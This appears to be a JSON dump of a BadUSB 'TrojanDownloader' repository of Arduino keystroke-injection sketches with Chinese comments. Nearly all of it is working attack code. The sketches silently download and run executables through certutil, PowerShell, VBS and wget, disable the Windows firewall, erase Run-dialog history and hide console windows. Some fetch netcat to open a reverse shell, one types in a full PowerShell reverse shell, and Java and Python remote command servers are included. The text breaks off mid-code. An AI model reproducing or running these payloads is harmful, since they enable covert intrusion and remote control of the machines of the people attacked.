Keyboard.println(\"echo sleep INPUT1 } >> %temp%\\\\up.ps1\");\n\n  Keyboard.println(\"echo Set oShell = CreateObject(\\\"WScript.Shell\\\") > %temp%\\\\ss.vbs\");\n  Keyboard.println(\"echo oShell.Run(\\\"powershell.exe -ep bypass -nologo -c %temp%\\\\ss.ps1\\\"),0,true >> %temp%\\\\ss.vbs\");\n  delay(1000);\n  Keyboard.println(\"wscript %temp%\\\\ss.vbs\");\n  Keyboard.println(\"echo Set oShell = CreateObject(\\\"WScript.Shell\\\") > %temp%\\\\up.vbs\");\n  Keyboard.println(\"echo oShell.Run(\\\"powershell.exe -ep bypass -nologo -c %temp%\\\\up.ps1\\\"),0,true >> %temp%\\\\up.vbs\");\n  delay(1000);\n  Keyboard.println(\"wscript %temp%\\\\up.vbs\");\n  delay(3000);\n  Keyboard.println(\"exit\");\n\n\n}\n\nvoid loop(){\n}\n\nDEFS"
  },
  {
    "path": "TrojanDownloader/CERTUTIL_DownLoader/CERTUTIL_DownLoader_MSF.ino",
    "content": "#include<Keyboard.h>\nvoid setup()\n{\n  Keyboard.begin();//开始键盘通信\n  delay(4000);//延时1000毫秒，不要太短，因为每台电脑的运行速度都不一样\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(500);\n  Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键\n  delay(500);\n  Keyboard.press('r');//按下r键\n  delay(500);\n  Keyboard.println(\"cmd.exe\");\n  delay(1000);\n  Keyboard.println(\"certutil -urlcache -split -f http://192.168.43.242/wwy.exe D:\\\\setup_11.5.0.exe\");\n  delay(1000);\n  delay(1000);\n  Keyboard.println(\"D:\\\\SETUP_11.5.0.EXE\");\n  delay(500);\n  Keyboard.println(\"exit\");\n  delay(500);\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键 最后我们再次关闭开启的大写键\n  delay(400);\n  Keyboard.end();//结束键盘通讯\n\n}\nvoid loop()\n{\n}"
  },
  {
    "path": "TrojanDownloader/FTP_DownLoader/FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(10000);//延时\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"CMD\");\n  delay(1000);\n  Keyboard.println(\"CD %userprofile%\");\n  delay(100);\n  Keyboard.println(\"NETSH FIREWALL SET OPMODE DISABLE\");  //关闭FIREWALL防火墙\n  delay(2000);\n  Keyboard.println(\"ECHO OPEN [ip] [PORT] > FTP.TXT\");  //输入自己的IP及端口，等待对方连接\n  delay(100);\n  Keyboard.println(\"ECHO [username] >> FTP.TXT\");  //输入用户名\n  delay(100);\n  Keyboard.println(\"ECHO [password] >> FTP.TXT\");  //输入密码\n  delay(100);\n  delay(100);\n  Keyboard.println(\"ECHO BIN >> FTP.TXT\");\n  delay(100);\n  Keyboard.println(\"ECHO GET NC.EXE >> FTP.TXT\");  //获取NC程序\n  delay(100);\n  Keyboard.println(\"ECHO BYE >> FTP.TXT\");\n  delay(100);\n  Keyboard.println(\"FTP -S:FTP.TXT\");\n  delay(100);\n  Keyboard.println(\"DEL FTP.TXT & EXIT\");\n  delay(2000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println(\"NC.EXE [listener ip] [listener port] -E CMD.EXE -D\");  //后台直接监听，输入自己的IP及端口，一旦连接执行CMD命令\n  delay(2000);\n    Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  delay(200);\n  Keyboard.println('CMD');\n  delay(600);\n  Keyboard.println('EXIT');\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "TrojanDownloader/JAVA_DownLoader/JavaTrojanWrite(TargetEnvironmentRunJava).ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(10000);//延时\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  //=========================Run==========================\n  Keyboard.println(\"CMD\");\n  delay(1000);\n \n  Keyboard.println(\"ECHO import java.awt.*; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO import java.awt.event.*;>> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO import java.io.*;>> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO import java.net.*;>> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO public class Client extends Frame implements ActionListener { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     Label label = new Label(\\\"指令\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     Panel panel = new Panel(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     TextField tf = new TextField(20); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     TextArea ta = new TextArea(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     Socket client; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     InputStream in; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     OutputStream out; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     public Client() { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         super(\\\"客户机\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         setSize(250, 250); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         panel.add(label); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         panel.add(tf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         tf.addActionListener(this); >> client.java\");\n  delay(100);\n  
Keyboard.println(\"ECHO         add(\\\"South\\\", panel); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         add(\\\"Center\\\", ta); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         addWindowListener(new WindowAdapter() { //退出 >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 public void windowClosing(WindowEvent e) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                     System.exit(0); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             }); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         show(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         try { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             client = new Socket(InetAddress.getLocalHost(), 6000); //向6000端口发出客户请求 >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             ta.append(\\\"服务器是:\\\" + client.getInetAddress().getHostAddress() + \\\"\\n\\n\\\"); >> client.java\");  //需要手动替换监听主机IP、端口，这里只给出思路\n  delay(100);\n  Keyboard.println(\"ECHO             in = client.getInputStream(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             out = client.getOutputStream(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } catch (IOException ioe) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         while (true) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             try { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 byte[] buf = new byte[256]; >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 in.read(buf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO                 String str = new String(buf); >> client.java\");\n  delay(100);\n 
 Keyboard.println(\"ECHO                 ta.append(str + \\\"\\n\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             catch (IOException e) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     public void actionPerformed(ActionEvent e) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         try { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             String str = tf.getText(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             byte[] buf = str.getBytes(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             tf.setText(null); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             out.write(buf); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO             ta.append(\\\"\\n指令:\\\" + str + \\\"\\n\\\"); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } catch (IOException ioe) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     public static void main(String[] args) { >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO         new Client(); >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO     } >> client.java\");\n  delay(100);\n  Keyboard.println(\"ECHO } >> client.java\");\n  delay(100);\n\n  Keyboard.println(\"javac client.java\");  //编译java文件\n  delay(6000);\n  Keyboard.println(\"java client\");  //执行java文件\n  delay(300);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  
delay(200);\n  Keyboard.println('CMD');\n  delay(600);\n  Keyboard.println('EXIT');\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "TrojanDownloader/JAVA_DownLoader/server.java",
    "content": "import java.io.*; \nimport java.net.*; \nimport java.awt.*; \nimport java.awt.event.*;\n \npublic class Server extends Frame \n{\n \nServerSocket server; \nSocket client; \nInputStream in; \nOutputStream out; \npublic Server() \n{ \nsuper(\"服务器\"); \nsetSize(250,250);   \naddWindowListener(new WindowAdapter(){ \n   public void windowClosing(WindowEvent e) \n   { \n    System.exit(0); \n   } \n}); \nshow(); \ntry{ \n   server=new ServerSocket(6000); \n   client=server.accept(); \n   in=client.getInputStream(); \n   out=client.getOutputStream(); \n}catch(IOException ioe){} \nwhile(true){ \n   try{ \nString Result=null;\n    byte[]buf=new byte[256]; \n    in.read(buf); \n    String str=new String(buf);\n \n    Process p = Runtime.getRuntime().exec(\"cmd /c \"+str);\n    BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));\n    while((Result=br.readLine())!=null)\n    {\n    out.write(Result.getBytes());\n        \n    }\n   }catch (IOException e){} \n} \n}\n \npublic static void main(String[]args) \n{ \nnew Server(); \n} \n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/Downloa_PSL_Trojan-Execute_aSecondTime.ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(5000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(500); \n  Keyboard.press('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP -eXECUTIONpOLICY bYPASS -W HIDDEN -C \\\"(nEW-oBJECT nET.wEBcLIENT).dOWNLOADfILE('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1','C:\\\\USERS\\\\PUBLIC\\\\sYSTEMnETWORKsERVICE.PS1')\\\";C:\\\\USERS\\\\PUBLIC\\\\sYSTEMnETWORKsERVICE.PS1;EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\nvoid loop()\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/LinkServer_MSF_PSL_Download.ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() \n{ //初始化，这里的代码只执行一次\ndelay(5000); //设置延时，让系统有足够的时间识别BadUsb5，防止后续代码执行错乱。\ndelay(1000);Keyboard.press(KEY_LEFT_GUI);\nKeyboard.press('r');Keyboard.releaseAll();delay(500);//针对shift+ctrl切换输入法\nKeyboard.press(KEY_LEFT_SHIFT);Keyboard.press(KEY_LEFT_CTRL);//针对win8及以上部分操作系统改换中文输入\nKeyboard.press(KEY_LEFT_GUI);Keyboard.println(' ');//某些输入法的中英文切换\nKeyboard.press(KEY_LEFT_SHIFT);//暴力直接切换成英文\nKeyboard.press(KEY_CAPS_LOCK)//手动释放按键\nKeyboard.releaseAll();\nKeyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键\nKeyboard.set_key1(KEY_R); // 同时按下R键\nKeyboard.send_now(); // 发送Win+R\ndelay(100);\nKeyboard.print(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\");\n//开启极小的CMD窗口，设置文字和背景对比度尽可能相近，达到隐藏输入的目的\nKeyboard.set_key1(KEY_ENTER);\nKeyboard.send_now();\ndelay(300);\nKeyboard.println(\"reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\"); //利用注册表清除开始--运行的记录\nKeyboard.set_key1(KEY_ENTER);\nKeyboard.send_now();\nKeyboard.println(\"powershell (new- object System.Net.WebClient).DownloadFile('http://196.168.x.x/a.exe','D://b.exe')\"); //下载木马并选择储存位置\nKeyboard.set_key1(KEY_ENTER);\nKeyboard.send_now();\nKeyboard.set_modifier(0);\nKeyboard.set_key1(0);\nKeyboard.send_now();\ndelay(3000); //设置延迟，等待下载完成\nKeyboard.println(\"D://1.exe\"); //执行打开命令\nKeyboard.set_key1(KEY_ENTER);\ndelay(300);\nKeyboard.set_modifier(0);\nKeyboard.set_key1(0);\nKeyboard.set_modifier(MODIFIERKEY_ALT);\nKeyboard.set_key1(KEY_SPACE);\nKeyboard.set_key2(KEY_C);\nKeyboard.send_now();\nKeyboard.set_modifier(0);\nKeyboard.set_key1(0);\nKeyboard.set_key2(0);\nKeyboard.send_now(); //关闭cmd窗口\n}\n\nvoid loop() //循环，这里的代码无限循环\n{\n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/LinkServer_PSL_Download.ino",
    "content": "#include<Keyboard.h>\n//Arduino Leonardo\n\nvoid setup()\n{ //初始化\nKeyboard.begin();//开始键盘通信\ndelay(1000);//延时1000毫秒，\nKeyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键\nKeyboard.press('r');//按下r键 CMD\ndelay(500);\nKeyboard.release(KEY_LEFT_GUI);//松掉win键\nKeyboard.release('r');//松掉r键\ndelay(500);\nKeyboard.println(\"cmd\");\nKeyboard.press(KEY_RETURN);  //按下回车键\nKeyboard.release(KEY_RETURN); //释放回车键\ndelay(500);\nKeyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\"); //缩小窗口\nKeyboard.println(\"powershell.exe -command start-process powershell -verb runAs\");  /*开启管理员级别的powershell*/\ndelay(2000);\nKeyboard.press(KEY_LEFT_ARROW); //按住左方向键\nKeyboard.release(KEY_LEFT_ARROW); //释放左方向键\ndelay(500);\nKeyboard.press(KEY_RETURN); //按下回车键\nKeyboard.release(KEY_RETURN);//释放enter键\ndelay(3000);\nKeyboard.println(\"$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT\"); //利用powershell 定义一个对象\nKeyboard.println(\"$P.dOWNLOADfILE('HTTP://192.168.x.x/a.PS1','C:\\\\TEMP\\\\b.PS1')\");  /*从服务端下载Powershell脚本*/\nKeyboard.println(\"C:\\\\TEMP\\\\STEP1.PS1\");\nKeyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\"); //缩小窗口\ndelay(500);\nKeyboard.end();//结束键盘通讯\n}\n\nvoid loop()//循环，这里的代码\n{\n//循环体\n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader0.ino",
    "content": "#include \"DigiKeyboard.h\"\n\nvoid setup() \n{\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(0);\nDigiKeyboard.delay(3000);\nDigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);\nDigiKeyboard.delay(1000);\nDigiKeyboard.print(F(\"powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');\"));\nDigiKeyboard.delay(500);\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\nDigiKeyboard.delay(750);\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\n}\n\nvoid loop() \n{\n\n}"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader1.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"CMD.EXE /t:01 /k MODE con: cols=16 lines=2\");\n  delay(1000);\n  Keyboard.println(\"POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'http://pan.plyz.net/d.asp?u=1948862583&p=x.exe';$FILE = ' c:\\\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);\");\n  delay(3000);\n  Keyboard.println(\"C:\\\\X.EXE&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader2.ino",
    "content": " void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500); \n  Keyboard.println(\"powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://192.168.1.102/x.exe';$file = ' C:\\\\x.exe ';$clnt.DownloadFile($url,$file);\"); \n  delay(3000);\n  Keyboard.println(\"c:\\\\x.exe&exit\");\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader3.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(20000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP -W HIDDEN -C \\\"sTART-pROCESS -fILEpATH POWERSHELL.EXE \\'-NOP -W HIDDEN -C iNVOKE-wEBrEQUEST -URI HTTP://127.0.0.1/1.JPG -oUTfILE C:\\\\1.JPG;C:\\\\1.JPG\\' -vERB RUNAS\\\"\");\n  Keyboard.println();\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_DownLoader4.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD.EXE /t:01 /k MODE con:cols=16 lines=5\");\n  delay(2000); \n  Keyboard.println(\"ECHO sET XpOST = cREATEoBJECT(\\\"mICROSOFT.xmlhttp\\\") >WEBDOWN.VBS&ECHO XpOST.oPEN \\\"get\\\",\\\"HTTP://WWW.BAIDU.COM/MD5.EXE\\\",0 >>WEBDOWN.VBS&ECHO XpOST.sEND() >>WEBDOWN.VBS&ECHO sET SgET = cREATEoBJECT(\\\"adodb.sTREAM\\\") >>WEBDOWN.VBS&ECHO SgET.mODE = 3 >>WEBDOWN.VBS&ECHO SgET.tYPE = 1 >>WEBDOWN.VBS&ECHO SgET.oPEN() >>WEBDOWN.VBS&ECHO SgET.wRITE(XpOST.RESPONSEbODY) >>WEBDOWN.VBS&ECHO SgET.sAVEtOfILE \\\"x.EXE\\\",2 >>WEBDOWN.VBS&ECHO WSCRIPT.CREATEOBJECT(\\\"WSCRIPT.SHELL\\\").RUN \\\"X.EXE\\\" >>WEBDOWN.VBS&&WEBDOWN.VBS&&EXIT\"); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_Downloader_Win&Linux_General.ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_CTRL);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('t');\n  Keyboard.release(KEY_LEFT_CTRL);\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(1000);\n  Keyboard.println(\"rm x.out\");\n  delay(1000);\n  Keyboard.println(\"wget http://127.0.0.1/x.out -O x.out\");\n  delay(1000);\n  Keyboard.println(\"chmod +x x.out\");\n  Keyboard.println(\"./x.out &\");\n  delay(1000);\n  Keyboard.println(\"exit\");\n  \n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1&reg delete HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\RunMRU /f\");\n  delay(500); \n  Keyboard.println(\"echo Set xPost = CreateObject(\\\"Microsoft.XMLHTTP\\\") >webdown.vbs&echo xPost.Open \\\"GET\\\",\\\"http://192.168.1.102/x.exe\\\",0 >>webdown.vbs&echo xPost.Send() >>webdown.vbs&echo Set sGet = CreateObject(\\\"ADODB.Stream\\\") >>webdown.vbs&echo sGet.Mode = 3 >>webdown.vbs&echo sGet.Type = 1 >>webdown.vbs&echo sGet.Open() >>webdown.vbs&echo sGet.Write(xPost.responseBody) >>webdown.vbs&echo sGet.SaveToFile \\\"x.exe\\\",2 >>webdown.vbs&cscript webdown.vbs&del webdown.vbs /Q /F&x.exe&exit\"); \n  Keyboard.end();\n}\nvoid loop() {\n}\n"
  },
  {
    "path": "TrojanDownloader/PSL_DownLoader/PSL_Writes_Bounces.ino",
    "content": "void setup() {\n  // put your setup code here, to run once:\n  //reverse_shell via cmd(local)\n  delay(5000);\n  Keyboard.press(KEY_LEFT_CTRL);\n  Keyboard.press(KEY_ESC);\n  Keyboard.releaseAll();\n  delay(500);\n\n  Keyboard.print(\"cmd.exe\");\n  Keyboard.press(KEY_LEFT_CTRL);\n  Keyboard.press(KEY_LEFT_SHIFT);\n  Keyboard.press(KEY_RETURN);\n  Keyboard.releaseAll();\n  delay(2500);\n  Keyboard.println(\"powershell\");\n  delay(200);\n  Keyboard.println(\"function cleanup {\");\n  Keyboard.println(\"if ($client.Connected -eq $true) {$client.Close()}\");\n  Keyboard.println(\"if ($process.ExitCode -ne $null) {$process.Close()}\");\n  Keyboard.println(\"exit}\");\n  // Setup 192.168.202.130 HERE\n  Keyboard.println(\"$address = '192.168.1.103'\");\n  // Setup PORT HERE\n  Keyboard.println(\"$port = '8000'\");\n  Keyboard.println(\"$client = New-Object system.net.sockets.tcpclient\");\n  Keyboard.println(\"$client.connect($address,$port)\");\n  Keyboard.println(\"$stream = $client.GetStream()\");\n  Keyboard.println(\"$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize\");\n  Keyboard.println(\"$process = New-Object System.Diagnostics.Process\");\n  Keyboard.println(\"$process.StartInfo.FileName = 'C:\\\\windows\\\\system32\\\\cmd.exe'\");\n  Keyboard.println(\"$process.StartInfo.RedirectStandardInput = 1\");\n  Keyboard.println(\"$process.StartInfo.RedirectStandardOutput = 1\");\n  Keyboard.println(\"$process.StartInfo.UseShellExecute = 0\");\n  Keyboard.println(\"$process.Start()\");\n  Keyboard.println(\"$inputstream = $process.StandardInput\");\n  Keyboard.println(\"$outputstream = $process.StandardOutput\");\n  Keyboard.println(\"Start-Sleep 1\");\n  Keyboard.println(\"$encoding = new-object System.Text.AsciiEncoding\");\n  Keyboard.println(\"while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}\");\n  Keyboard.println(\"$stream.Write($encoding.GetBytes($out),0,$out.Length)\");\n  
Keyboard.println(\"$out = $null; $done = $false; $testing = 0;\");\n  Keyboard.println(\"while (-not $done) {\");\n  Keyboard.println(\"if ($client.Connected -ne $true) {cleanup}\");\n  Keyboard.println(\"$pos = 0; $i = 1\");\n  Keyboard.println(\"while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {\");\n  Keyboard.println(\"$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)\");\n  Keyboard.println(\"$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}\");\n  Keyboard.println(\"if ($pos -gt 0) {\");\n  Keyboard.println(\"$string = $encoding.GetString($networkbuffer,0,$pos)\");\n  Keyboard.println(\"$inputstream.write($string)\");\n  Keyboard.println(\"start-sleep 1\");\n  Keyboard.println(\"if ($process.ExitCode -ne $null) {cleanup}\");\n  Keyboard.println(\"else {\");\n  Keyboard.println(\"$out = $encoding.GetString($outputstream.Read())\");\n  Keyboard.println(\"while($outputstream.Peek() -ne -1){\");\n  Keyboard.println(\"$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}\");\n  Keyboard.println(\"$stream.Write($encoding.GetBytes($out),0,$out.length)\");\n  Keyboard.println(\"$out = $null\");\n  Keyboard.println(\"$string = $null}} else {cleanup}}\");\n  Keyboard.println(\"\"); //Enter to start execution\n\n}\n\nvoid loop() {\n  // put your main code here, to run repeatedly:\n\n}\n"
  },
  {
    "path": "TrojanDownloader/PY_DownLoader/PyShellServer.py",
    "content": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n'''\nPyShell\nPyShell主要用于建立TCP连接，反弹Shell，远程执行命令\n其中Server端为攻击机（远程发送命令），Client端为被控端（接收命令并执行）\n\n'''\n\nimport socket\nimport base64\nimport sys\nimport binascii\nimport os\nimport re\nimport threading\nimport time\nfrom StringIO import StringIO\n\nclass servers:\n\n\t\"\"\" Server of PyShell\n\n\t\tPyShell服务端代码类\n\n\t\"\"\"\n\tdef __init__(self,server_address):\n\t\tself.server_address=server_address\n\t\tself.main()\n\n\tdef connec(self):\n\t\t\"\"\"\n\t\t配置监听参数，包括ip地址，port号，最大链接数量等。\n\t\t\"\"\"\n\t\ttry:\n\t\t\tself.server=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #TCP套接字\n\t\t\tself.server.bind(self.server_address) #ip:port\n\t\t\tself.server.listen(10)\t#设置最大连接数\n\t\t\tprint \"[*]Listening on %s:%d\" % (self.server_address[0],self.server_address[1])\n\t\texcept:\n\t\t\tprint u'参数填写有误,或者该端口已被占用！'\n\n\tdef handle_client(self):\n\t\t\t'''\n\t\t\t从客户端接收数据，并处理。\n\t\t\t'''\n\t\t\trequest=self.client.recv(409600)  #服务器端每次接收的最大数据\n\n\t\t\trequest=base64.b64decode(binascii.a2b_hex(request.strip())).split('*') #将接收到的数据进行解码\n\t\t\tprint request[0]   #输出接收到的数据\n\t\t\t\n\t\t\tpath=request[1]\n\t\t\tcontents=raw_input(path+'>')  #返回当前路径\n\n\t\t\ti='-p'\n\t\t\tif i in contents:\n\t\t\t\tlists=contents.split(' 